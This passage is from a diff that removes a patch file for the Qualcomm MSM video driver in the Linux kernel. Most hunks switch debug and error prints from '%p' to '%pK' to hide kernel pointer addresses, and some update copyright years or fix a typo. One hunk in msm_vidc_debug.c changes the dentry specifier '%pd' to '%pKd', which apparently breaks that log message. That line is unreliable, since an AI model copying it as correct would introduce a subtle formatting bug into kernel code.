- 			inst, inst->state);
- 		goto exit;
- 	}
-@@ -2755,7 +2755,7 @@ static int msm_vidc_stop(int flipped_state, struct msm_vidc_inst *inst)
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_STOP)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
- 			inst, inst->state);
- 		goto exit;
- 	}
-@@ -2785,7 +2785,7 @@ static int msm_vidc_release_res(int flipped_state, struct msm_vidc_inst *inst)
- 
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_RELEASE_RESOURCES)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
- 			inst, inst->state);
- 		goto exit;
- 	}
-@@ -2817,7 +2817,7 @@ static int msm_comm_session_close(int flipped_state,
- 	hdev = inst->core->device;
- 	if (IS_ALREADY_IN_STATE(flipped_state, MSM_VIDC_CLOSE)) {
- 		dprintk(VIDC_INFO,
--			"inst: %p is already in state: %d\n",
-+			"inst: %pK is already in state: %d\n",
- 						inst, inst->state);
- 		goto exit;
- 	}
-@@ -3221,16 +3221,16 @@ int msm_comm_try_state(struct msm_vidc_inst *inst, int state)
- 	struct msm_vidc_core *core;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	dprintk(VIDC_DBG,
--			"Trying to move inst: %p from: %#x to %#x\n",
-+			"Trying to move inst: %pK from: %#x to %#x\n",
- 			inst, inst->state, state);
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", inst);
-+				"Invalid core pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	mutex_lock(&inst->sync_lock);
-@@ -3636,7 +3636,7 @@ int msm_comm_qbuf(struct msm_vidc_inst *inst, struct vb2_buffer *vb)
- 	defer = defer ?: batch_mode && (!output_count || !capture_count);
- 
- 	if (defer) {
--		dprintk(VIDC_DBG, "Deferring queue of %p\n", vb);
-+		dprintk(VIDC_DBG, "Deferring queue of %pK\n", vb);
- 		return 0;
- 	}
- 
-@@ -3844,7 +3844,7 @@ int msm_comm_try_get_prop(struct msm_vidc_inst *inst, enum hal_property ptype,
- 		 */
- 
- 		dprintk(VIDC_ERR,
--			"In Wrong state to call Buf Req: Inst %p or Core %p\n",
-+			"In Wrong state to call Buf Req: Inst %pK or Core %pK\n",
- 				inst, inst->core);
- 		rc = -EAGAIN;
- 		mutex_unlock(&inst->sync_lock);
-@@ -3879,7 +3879,7 @@ int msm_comm_try_get_prop(struct msm_vidc_inst *inst, enum hal_property ptype,
- 		msecs_to_jiffies(msm_vidc_hw_rsp_timeout));
- 	if (!rc) {
- 		dprintk(VIDC_ERR,
--			"%s: Wait interrupted or timed out [%p]: %d\n",
-+			"%s: Wait interrupted or timed out [%pK]: %d\n",
- 			__func__, inst,
- 			SESSION_MSG_INDEX(HAL_SESSION_PROPERTY_INFO));
- 		inst->state = MSM_VIDC_CORE_INVALID;
-@@ -3919,7 +3919,7 @@ int msm_comm_release_output_buffers(struct msm_vidc_inst *inst)
- 	struct hfi_device *hdev;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	mutex_lock(&inst->outputbufs.lock);
-@@ -3934,12 +3934,12 @@ int msm_comm_release_output_buffers(struct msm_vidc_inst *inst)
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 	mutex_lock(&inst->outputbufs.lock);
-@@ -4035,18 +4035,18 @@ int msm_comm_release_scratch_buffers(struct msm_vidc_inst *inst,
- 	enum hal_buffer sufficiency = HAL_BUFFER_NONE;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 
-@@ -4123,18 +4123,18 @@ int msm_comm_release_persist_buffers(struct msm_vidc_inst *inst)
- 	struct hfi_device *hdev;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 
-@@ -4183,7 +4183,7 @@ int msm_comm_try_set_prop(struct msm_vidc_inst *inst,
- 	int rc = 0;
- 	struct hfi_device *hdev;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid input: %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid input: %pK\n", inst);
- 		return -EINVAL;
- 	}
- 
-@@ -4395,7 +4395,7 @@ void msm_comm_flush_pending_dynamic_buffers(struct msm_vidc_inst *inst)
- 	list_for_each_entry(binfo, &inst->registeredbufs.list, list) {
- 		if (binfo->type == V4L2_BUF_TYPE_VIDEO_CAPTURE_MPLANE) {
- 			dprintk(VIDC_DBG,
--				"%s: binfo = %p device_addr = %pa\n",
-+				"%s: binfo = %pK device_addr = %pa\n",
- 				__func__, binfo, &binfo->device_addr[0]);
- 			buf_ref_put(inst, binfo);
- 		}
-@@ -4414,18 +4414,18 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags)
- 	struct hfi_device *hdev;
- 	if (!inst) {
- 		dprintk(VIDC_ERR,
--				"Invalid instance pointer = %p\n", inst);
-+				"Invalid instance pointer = %pK\n", inst);
- 		return -EINVAL;
- 	}
- 	core = inst->core;
- 	if (!core) {
- 		dprintk(VIDC_ERR,
--				"Invalid core pointer = %p\n", core);
-+				"Invalid core pointer = %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
- 	if (!hdev) {
--		dprintk(VIDC_ERR, "Invalid device pointer = %p\n", hdev);
-+		dprintk(VIDC_ERR, "Invalid device pointer = %pK\n", hdev);
- 		return -EINVAL;
- 	}
- 
-@@ -4443,7 +4443,7 @@ int msm_comm_flush(struct msm_vidc_inst *inst, u32 flags)
- 			core->state == VIDC_CORE_INVALID ||
- 			core->state == VIDC_CORE_UNINIT) {
- 		dprintk(VIDC_ERR,
--				"Core %p and inst %p are in bad state\n",
-+				"Core %pK and inst %pK are in bad state\n",
- 					core, inst);
- 		msm_comm_flush_in_invalid_state(inst);
- 		return 0;
-@@ -4620,7 +4620,7 @@ int msm_vidc_trigger_ssr(struct msm_vidc_core *core,
- 	int rc = 0;
- 	struct hfi_device *hdev;
- 	if (!core || !core->device) {
--		dprintk(VIDC_WARN, "Invalid parameters: %p\n", core);
-+		dprintk(VIDC_WARN, "Invalid parameters: %pK\n", core);
- 		return -EINVAL;
- 	}
- 	hdev = core->device;
-@@ -4863,7 +4863,7 @@ int msm_comm_kill_session(struct msm_vidc_inst *inst)
- 		change_inst_state(inst, MSM_VIDC_CLOSE_DONE);
- 	} else {
- 		dprintk(VIDC_WARN,
--				"Inactive session %p, triggering an internal session error\n",
-+				"Inactive session %pK, triggering an internal session error\n",
- 				inst);
- 		msm_comm_generate_session_error(inst);
- 
-@@ -4879,7 +4879,7 @@ struct msm_smem *msm_comm_smem_alloc(struct msm_vidc_inst *inst,
- 	struct msm_smem *m = NULL;
- 
- 	if (!inst || !inst->core) {
--		dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- 		return NULL;
- 	}
- 	m = msm_smem_alloc(inst->mem_client, size, align,
-@@ -4891,7 +4891,7 @@ void msm_comm_smem_free(struct msm_vidc_inst *inst, struct msm_smem *mem)
- {
- 	if (!inst || !inst->core || !mem) {
- 		dprintk(VIDC_ERR,
--			"%s: invalid params: %p %p\n", __func__, inst, mem);
-+			"%s: invalid params: %pK %pK\n", __func__, inst, mem);
- 		return;
- 	}
- 	msm_smem_free(inst->mem_client, mem);
-@@ -4902,7 +4902,7 @@ int msm_comm_smem_cache_operations(struct msm_vidc_inst *inst,
- {
- 	if (!inst || !mem) {
- 		dprintk(VIDC_ERR,
--			"%s: invalid params: %p %p\n", __func__, inst, mem);
-+			"%s: invalid params: %pK %pK\n", __func__, inst, mem);
- 		return -EINVAL;
- 	}
- 	return msm_smem_cache_operations(inst->mem_client, mem, cache_ops);
-@@ -4914,7 +4914,7 @@ struct msm_smem *msm_comm_smem_user_to_kernel(struct msm_vidc_inst *inst,
- 	struct msm_smem *m = NULL;
- 
- 	if (!inst || !inst->core) {
--		dprintk(VIDC_ERR, "%s: invalid inst: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s: invalid inst: %pK\n", __func__, inst);
- 		return NULL;
- 	}
- 
-@@ -5055,7 +5055,7 @@ int msm_vidc_comm_s_parm(struct msm_vidc_inst *inst, struct v4l2_streamparm *a)
- 		fps = fps - 1;
- 
- 	if (inst->prop.fps != fps) {
--		dprintk(VIDC_PROF, "reported fps changed for %p: %d->%d\n",
-+		dprintk(VIDC_PROF, "reported fps changed for %pK: %d->%d\n",
- 				inst, inst->prop.fps, fps);
- 		inst->prop.fps = fps;
- 		frame_rate.frame_rate = inst->prop.fps * BIT(16);
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-index 5e29fb9..b474d48 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_dcvs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014 - 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -47,7 +47,7 @@ static inline int msm_dcvs_count_active_instances(struct msm_vidc_core *core)
- 	struct msm_vidc_inst *inst = NULL;
- 
- 	if (!core) {
--		dprintk(VIDC_ERR, "%s: Invalid args: %p\n", __func__, core);
-+		dprintk(VIDC_ERR, "%s: Invalid args: %pK\n", __func__, core);
- 		return -EINVAL;
- 	}
- 
-@@ -95,7 +95,7 @@ static void msm_dcvs_update_dcvs_params(int idx, struct msm_vidc_inst *inst)
- 	struct dcvs_table *table = NULL;
- 
- 	if (!inst || !inst->core) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 
-@@ -160,7 +160,7 @@ static void msm_dcvs_dec_check_and_scale_clocks(struct msm_vidc_inst *inst)
- void msm_dcvs_check_and_scale_clocks(struct msm_vidc_inst *inst, bool is_etb)
- {
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 
-@@ -216,7 +216,7 @@ void msm_dcvs_init_load(struct msm_vidc_inst *inst)
- 	dprintk(VIDC_DBG, "Init DCVS Load\n");
- 
- 	if (!inst || !inst->core) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 
-@@ -289,7 +289,7 @@ void msm_dcvs_init(struct msm_vidc_inst *inst)
- 	dprintk(VIDC_DBG, "Init DCVS Struct\n");
- 
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 
-@@ -306,7 +306,7 @@ void msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst)
- 	struct hal_buffer_requirements *output_buf_req;
- 
- 	if (!inst) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, inst);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, inst);
- 		return;
- 	}
- 	dcvs = &inst->dcvs;
-@@ -315,7 +315,7 @@ void msm_dcvs_monitor_buffer(struct msm_vidc_inst *inst)
- 	output_buf_req = get_buff_req_buffer(inst,
- 				msm_comm_get_hal_output_buffer(inst));
- 	if (!output_buf_req) {
--		dprintk(VIDC_ERR, "%s : Get output buffer req failed %p\n",
-+		dprintk(VIDC_ERR, "%s : Get output buffer req failed %pK\n",
- 			__func__, inst);
- 		mutex_unlock(&inst->lock);
- 		return;
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-index ff29d69..4d4acfa 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -77,13 +77,13 @@ static ssize_t core_info_read(struct file *file, char __user *buf,
- 	int i = 0, rc = 0;
- 
- 	if (!core || !core->device) {
--		dprintk(VIDC_ERR, "Invalid params, core: %p\n", core);
-+		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- 		return 0;
- 	}
- 	hdev = core->device;
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
--	write_str(&dbg_buf, "CORE %d: %p\n", core->id, core);
-+	write_str(&dbg_buf, "CORE %d: %pK\n", core->id, core);
- 	write_str(&dbg_buf, "===============================\n");
- 	write_str(&dbg_buf, "Core state: %d\n", core->state);
- 	rc = call_hfi_op(hdev, get_fw_info, hdev->hfi_device_data, &fw_info);
-@@ -153,7 +153,7 @@ struct dentry *msm_vidc_debugfs_init_drv(void)
- 	struct dentry *f = debugfs_create_##__type(__name, S_IRUGO | S_IWUSR, \
- 		dir, __value);                                                \
- 	if (IS_ERR_OR_NULL(f)) {                                              \
--		dprintk(VIDC_ERR, "Failed creating debugfs file '%pd/%s'\n",  \
-+		dprintk(VIDC_ERR, "Failed creating debugfs file '%pKd/%s'\n",  \
- 			dir, __name);                                         \
- 		f = NULL;                                                     \
- 	}                                                                     \
-@@ -204,7 +204,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core,
- 	struct dentry *dir = NULL;
- 	char debugfs_name[MAX_DEBUGFS_NAME];
- 	if (!core) {
--		dprintk(VIDC_ERR, "Invalid params, core: %p\n", core);
-+		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core);
- 		goto failed_create_dir;
- 	}
- 
-@@ -268,15 +268,15 @@ static ssize_t inst_info_read(struct file *file, char __user *buf,
- 	struct msm_vidc_inst *inst = file->private_data;
- 	int i, j;
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid params, core: %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid params, core: %pK\n", inst);
- 		return 0;
- 	}
- 	INIT_DBG_BUF(dbg_buf);
- 	write_str(&dbg_buf, "===============================\n");
--	write_str(&dbg_buf, "INSTANCE: %p (%s)\n", inst,
-+	write_str(&dbg_buf, "INSTANCE: %pK (%s)\n", inst,
- 		inst->session_type == MSM_VIDC_ENCODER ? "Encoder" : "Decoder");
- 	write_str(&dbg_buf, "===============================\n");
--	write_str(&dbg_buf, "core: %p\n", inst->core);
-+	write_str(&dbg_buf, "core: %pK\n", inst->core);
- 	write_str(&dbg_buf, "height: %d\n", inst->prop.height[CAPTURE_PORT]);
- 	write_str(&dbg_buf, "width: %d\n", inst->prop.width[CAPTURE_PORT]);
- 	write_str(&dbg_buf, "fps: %d\n", inst->prop.fps);
-@@ -343,10 +343,10 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst,
- 	struct dentry *dir = NULL;
- 	char debugfs_name[MAX_DEBUGFS_NAME];
- 	if (!inst) {
--		dprintk(VIDC_ERR, "Invalid params, inst: %p\n", inst);
-+		dprintk(VIDC_ERR, "Invalid params, inst: %pK\n", inst);
- 		goto failed_create_dir;
- 	}
--	snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%p", inst);
-+	snprintf(debugfs_name, MAX_DEBUGFS_NAME, "inst_%pK", inst);
- 	dir = debugfs_create_dir(debugfs_name, parent);
- 	if (!dir) {
- 		dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n");
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c b/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c
-index 6a98cea..9da2c11 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc_res_parse.c
-@@ -1170,7 +1170,7 @@ static int msm_vidc_setup_context_bank(struct context_bank_info *cb,
- 
- 	dprintk(VIDC_DBG, "Attached %s and created mapping\n", dev_name(dev));
- 	dprintk(VIDC_DBG,
--		"Context bank name:%s, buffer_type: %#x, is_secure: %d, address range start: %#x, size: %#x, dev: %p, mapping: %p",
-+		"Context bank name:%s, buffer_type: %#x, is_secure: %d, address range start: %#x, size: %#x, dev: %pK, mapping: %pK",
- 		cb->name, cb->buffer_type, cb->is_secure, cb->addr_range.start,
- 		cb->addr_range.size, cb->dev, cb->mapping);
- 
-@@ -1194,7 +1194,7 @@ int msm_vidc_smmu_fault_handler(struct iommu_domain *domain,
- 	enum vidc_ports port;
- 
- 	if (!domain || !core) {
--		dprintk(VIDC_ERR, "%s - invalid param %p %p\n",
-+		dprintk(VIDC_ERR, "%s - invalid param %pK %pK\n",
- 			__func__, domain, core);
- 		return -EINVAL;
- 	}
-@@ -1216,7 +1216,7 @@ int msm_vidc_smmu_fault_handler(struct iommu_domain *domain,
- 			!inst->bit_depth ? "8" : "10");
- 
- 		dprintk(VIDC_ERR,
--			"---Buffer details for inst: %p of type: %d---\n",
-+			"---Buffer details for inst: %pK of type: %d---\n",
- 			inst, inst->session_type);
- 		mutex_lock(&inst->registeredbufs.lock);
- 		dprintk(VIDC_ERR, "registered buffer list:\n");
-diff --git a/drivers/media/platform/msm/vidc/venus_boot.c b/drivers/media/platform/msm/vidc/venus_boot.c
-index 6e881ab..925c97a 100644
---- a/drivers/media/platform/msm/vidc/venus_boot.c
-+++ b/drivers/media/platform/msm/vidc/venus_boot.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -161,7 +161,7 @@ static int venus_setup_cb(struct device *dev,
- 		return -ENODEV;
- 	}
- 	dprintk(VIDC_DBG,
--		"%s Attached device %p and created mapping %p for %s\n",
-+		"%s Attached device %pK and created mapping %pK for %s\n",
- 		__func__, dev, venus_data->mapping, dev_name(dev));
- 	return 0;
- }
-diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c
-index ee4e7ae..b6c1f49 100644
---- a/drivers/media/platform/msm/vidc/venus_hfi.c
-+++ b/drivers/media/platform/msm/vidc/venus_hfi.c
-@@ -341,7 +341,7 @@ static int __write_queue(struct vidc_iface_q_info *qinfo, u8 *packet,
- 	}
- 
- 	if (msm_vidc_debug & VIDC_PKT) {
--		dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo);
-+		dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo);
- 		__dump_packet(packet);
- 	}
- 
-@@ -547,7 +547,7 @@ static int __read_queue(struct vidc_iface_q_info *qinfo, u8 *packet,
- 	*pb_tx_req_is_set = (1 == queue->qhdr_tx_req) ? 1 : 0;
- 
- 	if (msm_vidc_debug & VIDC_PKT) {
--		dprintk(VIDC_PKT, "%s: %p\n", __func__, qinfo);
-+		dprintk(VIDC_PKT, "%s: %pK\n", __func__, qinfo);
- 		__dump_packet(packet);
- 	}
- 
-@@ -574,7 +574,7 @@ static int __smem_alloc(struct venus_hfi_device *dev,
- 		goto fail_smem_alloc;
- 	}
- 
--	dprintk(VIDC_DBG, "__smem_alloc: ptr = %p, size = %d\n",
-+	dprintk(VIDC_DBG, "__smem_alloc: ptr = %pK, size = %d\n",
- 			alloc->kvaddr, size);
- 	rc = msm_smem_cache_operations(dev->hal_client, alloc,
- 		SMEM_CACHE_CLEAN);
-@@ -595,7 +595,7 @@ fail_smem_alloc:
- static void __smem_free(struct venus_hfi_device *dev, struct msm_smem *mem)
- {
- 	if (!dev || !mem) {
--		dprintk(VIDC_ERR, "invalid param %p %p\n", dev, mem);
-+		dprintk(VIDC_ERR, "invalid param %pK %pK\n", dev, mem);
- 		return;
- 	}
- 
-@@ -608,7 +608,7 @@ static void __write_register(struct venus_hfi_device *device,
- 	u32 hwiosymaddr = reg;
- 	u8 *base_addr;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return;
- 	}
- 
-@@ -622,7 +622,7 @@ static void __write_register(struct venus_hfi_device *device,
- 	}
- 
- 	base_addr = device->hal_data->register_base;
--	dprintk(VIDC_DBG, "Base addr: %p, written to: %#x, Value: %#x...\n",
-+	dprintk(VIDC_DBG, "Base addr: %pK, written to: %#x, Value: %#x...\n",
- 		base_addr, hwiosymaddr, value);
- 	base_addr += hwiosymaddr;
- 	writel_relaxed(value, base_addr);
-@@ -634,7 +634,7 @@ static int __read_register(struct venus_hfi_device *device, u32 reg)
- 	int rc = 0;
- 	u8 *base_addr;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -651,7 +651,7 @@ static int __read_register(struct venus_hfi_device *device, u32 reg)
- 
- 	rc = readl_relaxed(base_addr + reg);
- 	rmb();
--	dprintk(VIDC_DBG, "Base addr: %p, read from: %#x, value: %#x...\n",
-+	dprintk(VIDC_DBG, "Base addr: %pK, read from: %#x, value: %#x...\n",
- 		base_addr, reg, rc);
- 
- 	return rc;
-@@ -699,7 +699,7 @@ static void __iommu_detach(struct venus_hfi_device *device)
- 	struct context_bank_info *cb;
- 
- 	if (!device || !device->res) {
--		dprintk(VIDC_ERR, "Invalid paramter: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid parameter: %pK\n", device);
- 		return;
- 	}
- 
-@@ -1024,7 +1024,7 @@ static int __set_imem(struct venus_hfi_device *device, struct imem *imem)
- 	int rc = 0;
- 
- 	if (!device || !device->res || !imem) {
--		dprintk(VIDC_ERR, "Invalid params, core: %p, imem: %p\n",
-+		dprintk(VIDC_ERR, "Invalid params, core: %pK, imem: %pK\n",
- 			device, imem);
- 		return -EINVAL;
- 	}
-@@ -1263,7 +1263,7 @@ static unsigned long venus_hfi_get_core_clock_rate(void *dev, bool actual_rate)
- 	struct clock_info *vc;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "%s Invalid args: %p\n", __func__, device);
-+		dprintk(VIDC_ERR, "%s Invalid args: %pK\n", __func__, device);
- 		return -EINVAL;
- 	}
- 
-@@ -1328,7 +1328,7 @@ static int __halt_axi(struct venus_hfi_device *device)
- 	u32 reg;
- 	int rc = 0;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid input: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid input: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -1526,7 +1526,7 @@ static int venus_hfi_scale_clocks(void *dev, int load,
- 	struct venus_hfi_device *device = dev;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid args: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid args: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -2173,7 +2173,7 @@ static int venus_hfi_core_init(void *device)
- 			goto err_core_init;
- 		}
- 
--		dprintk(VIDC_DBG, "Dev_Virt: %pa, Reg_Virt: %p\n",
-+		dprintk(VIDC_DBG, "Dev_Virt: %pa, Reg_Virt: %pK\n",
- 			&dev->hal_data->firmware_base,
- 			dev->hal_data->register_base);
- 
-@@ -2293,12 +2293,12 @@ static void __core_clear_interrupt(struct venus_hfi_device *device)
- 		device->intr_status |= intr_status;
- 		device->reg_count++;
- 		dprintk(VIDC_DBG,
--			"INTERRUPT for device: %p: times: %d interrupt_status: %d\n",
-+			"INTERRUPT for device: %pK: times: %d interrupt_status: %d\n",
- 			device, device->reg_count, intr_status);
- 	} else {
- 		device->spur_count++;
- 		dprintk(VIDC_INFO,
--			"SPURIOUS_INTR for device: %p: times: %d interrupt_status: %d\n",
-+			"SPURIOUS_INTR for device: %pK: times: %d interrupt_status: %d\n",
- 			device, device->spur_count, intr_status);
- 	}
- 
-@@ -2456,7 +2456,7 @@ static void __set_default_sys_properties(struct venus_hfi_device *device)
- 
- static void __session_clean(struct hal_session *session)
- {
--	dprintk(VIDC_DBG, "deleted the session: %p\n", session);
-+	dprintk(VIDC_DBG, "deleted the session: %pK\n", session);
- 	list_del(&session->list);
- 	/* Poison the session handle with zeros */
- 	*session = (struct hal_session){ {0} };
-@@ -3495,7 +3495,7 @@ static int __response_handler(struct venus_hfi_device *device)
- 					(u32)(uintptr_t)*session_id);
- 			if (!session) {
- 				dprintk(VIDC_ERR,
--						"Received a packet (%#x) for an unrecognized session (%p), discarding\n",
-+						"Received a packet (%#x) for an unrecognized session (%pK), discarding\n",
- 						info->response_type,
- 						*session_id);
- 				--packet_count;
-@@ -3545,7 +3545,7 @@ static void venus_hfi_core_work_handler(struct work_struct *work)
- 	}
- 
- 	if (!device->callback) {
--		dprintk(VIDC_ERR, "No interrupt callback function: %p\n",
-+		dprintk(VIDC_ERR, "No interrupt callback function: %pK\n",
- 				device);
- 		goto err_no_work;
- 	}
-@@ -3671,7 +3671,7 @@ static inline int __init_clocks(struct venus_hfi_device *device)
- 	struct clock_info *cl = NULL;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -3715,7 +3715,7 @@ static inline void __disable_unprepare_clks(struct venus_hfi_device *device)
- 	struct clock_info *cl;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return;
- 	}
- 
-@@ -3732,7 +3732,7 @@ static inline int __prepare_enable_clks(struct venus_hfi_device *device)
- 	struct clock_info *cl = NULL, *cl_fail = NULL;
- 	int rc = 0;
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	}
- 
-@@ -4192,7 +4192,7 @@ static inline int __suspend(struct venus_hfi_device *device)
- 	int rc = 0;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	} else if (!device->power_enabled) {
- 		dprintk(VIDC_DBG, "Power already disabled\n");
-@@ -4223,7 +4223,7 @@ static inline int __resume(struct venus_hfi_device *device)
- 	int rc = 0;
- 
- 	if (!device) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n", device);
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n", device);
- 		return -EINVAL;
- 	} else if (device->power_enabled) {
- 		dprintk(VIDC_DBG, "Power is already enabled\n");
-@@ -4532,7 +4532,7 @@ static struct venus_hfi_device *__get_device(u32 device_id,
- 				hfi_cmd_response_callback callback)
- {
- 	if (!res || !callback) {
--		dprintk(VIDC_ERR, "Invalid params: %p %p\n", res, callback);
-+		dprintk(VIDC_ERR, "Invalid params: %pK %pK\n", res, callback);
- 		return NULL;
- 	}
- 
-@@ -4610,7 +4610,7 @@ int venus_hfi_initialize(struct hfi_device *hdev, u32 device_id,
- 	int rc = 0;
- 
- 	if (!hdev || !res || !callback) {
--		dprintk(VIDC_ERR, "Invalid params: %p %p %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK %pK %pK\n",
- 			hdev, res, callback);
- 		rc = -EINVAL;
- 		goto err_venus_hfi_init;
-diff --git a/drivers/media/platform/msm/vidc/vidc_hfi.c b/drivers/media/platform/msm/vidc/vidc_hfi.c
